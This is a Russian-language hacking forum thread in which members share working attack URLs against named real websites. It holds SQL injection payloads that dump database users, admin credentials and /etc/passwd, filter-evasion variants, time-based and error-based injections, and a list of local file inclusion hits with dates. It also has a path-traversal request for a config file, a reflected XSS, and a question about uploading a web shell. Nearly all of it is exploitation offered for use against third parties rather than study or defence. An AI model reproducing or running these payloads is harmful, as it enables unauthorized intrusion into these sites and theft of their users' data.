Уязвимости SQLi, XSS и другие.

Обсуждение в разделе «Песочница», начал(-а) Егорыч+++, 10.05.2015.

  1. Печа

    Печа Member

    Регистрация:
    9.05.2015
    Сообщения:
    46
    Одобрения:
    21
    Репутация:
    17
    Сайт:ene.com.tw
    SQLi черз GET с чтением файла из файловой системы, уязвимый параметр pid
    root:Y,root:Y,root:Y,:N,:N,enemysql:N,enemysql:Y.
    enemysql@localhost:5.1.73:redhat-linux-gnu:x86_64:/var/log/mysqld.log.
    Эксплоит:
    Code:
    http://www.ene.com.tw/english/ir/newsdetail.php?fid=14&pid=-1' union all select 1,2,3,group_concat(user,0x3a,file_priv),5,@@version,load_file('/etc/passwd'),8,9,10 from mysql.user --+
     
    Это одобряют palec2006 и Imperou$.
  2. BabaDook

    BabaDook Level 8

    Регистрация:
    9.05.2015
    Сообщения:
    709
    Одобрения:
    811
    Репутация:
    51
  3. Octavian

    Octavian Member

    Регистрация:
    8.07.2015
    Сообщения:
    395
    Одобрения:
    61
    Репутация:
    14
    Это одобряют BigBear, Coost и man474019.
  4. paponi

    paponi New Member

    Регистрация:
    30.05.2017
    Сообщения:
    12
    Одобрения:
    4
    Репутация:
    0
  5. x4t3a

    x4t3a New Member

    Регистрация:
    14.02.2017
    Сообщения:
    1
    Одобрения:
    0
    Репутация:
    0
  6. paponi

    paponi New Member

    Регистрация:
    30.05.2017
    Сообщения:
    12
    Одобрения:
    4
    Репутация:
    0
    Давно созрел вопрос, да только все никак руки не "доходили". Можно ли залить шелл вместо "load_file('/etc/passwd')"? Просто пока не понимаю, почему срабатывает php в SQL иньекции...
     
  7. t0ma5

    t0ma5 Reservists Of Antichat

    Регистрация:
    10.02.2012
    Сообщения:
    702
    Одобрения:
    582
    Репутация:
    65
    _________________________
    Это одобряет Veil.
  8. paponi

    paponi New Member

    Регистрация:
    30.05.2017
    Сообщения:
    12
    Одобрения:
    4
    Репутация:
    0
    Спасибо. Век живи, век учись.
     
    Это одобряют palec2006 и Grosser.
  9. Grosser

    Grosser New Member

    Регистрация:
    11.10.2017
    Сообщения:
    1
    Одобрения:
    0
    Репутация:
    3
    Я кодинге не очень силен, но таковы правила форума и писать я могу только здесь. Помогите набрать 5 репутации
     
  10. BabaDook

    BabaDook Level 8

    Регистрация:
    9.05.2015
    Сообщения:
    709
    Одобрения:
    811
    Репутация:
    51
    PHP:
    http://www.handelingsgerichtwerken.be/bestanden/download.php?id=69'+and+false+union select null,2,3,4,group_concat(0x202020,table_name,0x3c3e,column_name)+from information_schema.columns+where table_schema=database()+--+-
     
    Это одобряют Octavian и SooLFaa.
  11. Octavian

    Octavian Member

    Регистрация:
    8.07.2015
    Сообщения:
    395
    Одобрения:
    61
    Репутация:
    14
    Code:
    http://www.saifaiims.com/download.php?filename=../config/configuration.php
     
    Это одобряет ShpillyWilly.
  12. The404

    The404 New Member

    Регистрация:
    9.10.2016
    Сообщения:
    4
    Одобрения:
    3
    Репутация:
    0
    Code:
    http://www.baikap.de/index2.php?include=/etc/passwd&id=85&language=E|LFI|[DE] Germany|12/21/2017 05:38:42
    http://www.avionews.it/index.php?corpo=/etc/passwd&news_id=1207340&pagina_chiamante=index.php|LFI|[IT] Italy|12/22/2017 06:51:05
    https://drbl.org/management/techrpt.php?c=../../../../../etc/passwd&t=Start, restart or stop DRBL-related services|LFI|[JP] Japan|12/23/2017 06:10:26
    http://caiana.caia.org.ar/template/caiana.php?pag=../../../../../etc/passwd&vol=3|LFI|[AR] Argentina|12/23/2017 08:47:59
    http://www.energetica-india.net/download.php?seccion=articles&archivo=../../../../../../../../etc/passwd|LFI|[ES] Spain|12/23/2017 08:52:43
    http://www.mcu.es/deportebase/cgi/um?M=/d7/f7&O=..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00&N=&L=0|LFI|[ES] Spain|12/23/2017 09:00:57
    https://www.txregionalcouncil.org/display.php?page=/etc/passwd|LFI|[US] United States|12/23/2017 09:10:58
    http://www.basegroup.su/index.php?Page=http%3a%2f%2fwww.google.com|RFI|[RU] Russian Federation|12/23/2017 09:58:38
    http://www.iatvt.ru/index.cgi?doc=../../../../../../etc/passwd%00|LFI|[RU] Russian Federation|12/23/2017 10:54:42
    http://www.musifratz.de/content.php?seite=/etc/passwd&rubrik=kinderkultur&ansicht=projekte|LFI|[DE] Germany|12/23/2017 11:13:42
     
    Это одобряют Печа и ShpillyWilly.
  13. BabaDook

    BabaDook Level 8

    Регистрация:
    9.05.2015
    Сообщения:
    709
    Одобрения:
    811
    Репутация:
    51
    PHP:
    http://www.bpc.gov.bd/contactus.php?id=4439'+/*!12345UNiOn*/%0ASeLEct+1,2,/*!50000user()*/,4,5,6,7+--+_
    ebfashion.com.bd/index.php?id=-8'+UnIoN+SeLEcT+1,user(),2+--+-
    http://www.vertexhome.co.il/pageE.php?id=110+UnIon+SeLEct+1,2,3,4,5,6,7,8,9,group_concat(table_name),11 from information_schema.tables where table_schema=database()+--+-
    http://foundation.sigmachi.org/station.php?id=wtg'
    +and+false+UnIon%0ASeLEct+1,user(),3,4,5,6+--+_
    http
    ://www.commongroundnews.org/article.php?id=-32240'+/*!12345UnIoN%0ASeLEcT*/+1,2,user(),4,(/*!12345SELECT*/+/*!12345GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+FROM+/*!50000INFORMATION_SCHEMA.TABLES*/+WHERE+TABLE_SCHEMA=DATABASE()),6,7,8,9,10,11,12,131,4,15,15,15,15,15,16,16,22+--+-&lan=ba&sp=1
    http://oppodigital.in/product-details.php?id=9 and false UNiOn+SElEcT @,@,@,@,@,@,@,@,group_concat(table_name),@ from information_schema.tables #
    HTML:
    https://depositfiles.od.ua/tools/httpheaders.php
    [​IMG]
     
    #293 BabaDook, 2.01.2018
    В последний раз редактировалось: 6.01.2018
    Это одобряет grimnir.
  14. ShpillyWilly

    ShpillyWilly New Member

    Регистрация:
    27.09.2012
    Сообщения:
    64
    Одобрения:
    3
    Репутация:
    0
    HTML:
    http://www.tnla.com/events.php?id=38+UNION+SELECT+1,concat(username,password)+from+tnlacom_tnla.admin_users+--+
     
  15. BabaDook

    BabaDook Level 8

    Регистрация:
    9.05.2015
    Сообщения:
    709
    Одобрения:
    811
    Репутация:
    51
    PHP:
    http://www.kiwi.pk/gallery.php?id=street-wear.html'+and+false+/*!50000UnIoN*/+SeLecT+user()+--+-
    PHP:
    smste.ru/smste.rar
    PHP:
    http://ecs.gov.bd/Bangla/QLTemplate1.php?Parameter_QLSCat_ID=Bangla/QLTemplate1.php?Parameter_QLSCat_ID='+UnIoN+seLEct user()+--+-
     
    #295 BabaDook, 9.01.2018
    В последний раз редактировалось: 10.01.2018
    Это одобряют ms13 и man474019.
  16. Mexel

    Mexel Member

    Регистрация:
    22.11.2016
    Сообщения:
    12
    Одобрения:
    9
    Репутация:
    3
    Провайдер Электронный щит.
    Локальная XSS.
    Code:
    http://wwwcom.ru/connect.php/%22%3E%3Cscript%3Ealert('Tayler(Mexel)')%3C/script%3E
     
  17. BabaDook

    BabaDook Level 8

    Регистрация:
    9.05.2015
    Сообщения:
    709
    Одобрения:
    811
    Репутация:
    51
    PHP:
    Подбираем  кол-во  полей
    http
    ://restaurantsdelhi.in/product-details.php?mainleadid=1682' into @,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@+--+-
    Выводим данные
    http
    ://restaurantsdelhi.in/product-details.php?mainleadid=163382' union select @,@,@,user(),@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@+--+-
     
  18. joelblack

    joelblack Level 8

    Регистрация:
    6.07.2015
    Сообщения:
    97
    Одобрения:
    103
    Репутация:
    23
    target: http://www.premium-network.ru
    type: Time-based, Error-based
    user: forumpt@localhost1
    version: 5.5.371

    Time-based:
    Code:
    www.premium-network.ru/index.php?id=sktv_news&ns=70'+and+if(substring(version(),1,1)=5,SLEEP(15),1)--+


    Error-based:
    Code:
    http://www.premium-network.ru/index.php?id=sktv_news&ns=70%27%20union%20select%20count(*),concat(version(),floor(rand(0)*2))x,2,3%20from%20information_schema.tables%20group%20by%20x--+

     
Загрузка...